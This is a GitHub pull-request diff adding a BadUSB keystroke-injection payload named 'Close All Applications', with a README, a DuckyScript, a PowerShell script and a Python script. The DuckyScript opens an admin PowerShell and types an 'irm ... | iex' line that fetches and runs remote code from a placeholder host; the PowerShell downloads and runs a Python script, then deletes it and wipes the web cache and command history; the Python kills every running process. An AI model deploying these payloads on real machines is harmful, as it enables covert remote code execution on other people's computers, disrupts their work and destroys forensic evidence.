Merge pull request #144 from aleff-github/patch-11

Close All Applications
pull/178/head
Kalani Helekunihi 2023-06-12 14:54:57 -04:00 committed by GitHub
commit 4b16278abd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 92 additions and 0 deletions

View File

@ -0,0 +1,28 @@
# Close All Applications - BADUSB ✅
A script used to close all target open applications.
🟢 **Plug-And-Play** 🟢
**Category**: Execution
## Description
A script used to close all target open applications.
Opens PowerShell hidden, download a Python script, execute it, remove Python script downloaded, delete powershell history.
## Getting Started
### Dependencies
* Internet Connection
* Windows 10,11
### Executing program
* Plug in your device
### Settings
- No settings - Plug-And-Play

View File

@ -0,0 +1,18 @@
# Download Python script
# Reply $scriptUrl with YOUR LINK. The Payload should be script.py
$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"
$savePath = "$env:temp\script.py"
(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)
# Execute Python script
& python $savePath
# Delete the downloaded script
Remove-Item $savePath
# Clear the download history from the system's web cache
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force
# Clear the PowerShell command history
Clear-History

View File

@ -0,0 +1,34 @@
REM #####################################################
REM # |
REM # Title : Close All Applications |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################################
REM Plug-And-Play
REM
REM 1. Open a powershell
REM 2. Download a Python script
REM 3. Execute it
REM 4. Remove Python script downloaded
REM 5. Delete powershell history
REM
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
DEFINE POWERSHELL_CODE example.com
DELAY 2000
GUI x
DELAY 250
REPEAT 10 DOWNARROW
ENTER
DELAY 1000
REPEAT 2 TAB
ENTER
DELAY 2000
STRING irm POWERSHELL_CODE | iex
ENTER

View File

@ -0,0 +1,12 @@
try:
import psutil
except:
import os
os.system("pip install psutil")
import psutil
for process in psutil.process_iter():
try:
process.terminate()
except:
pass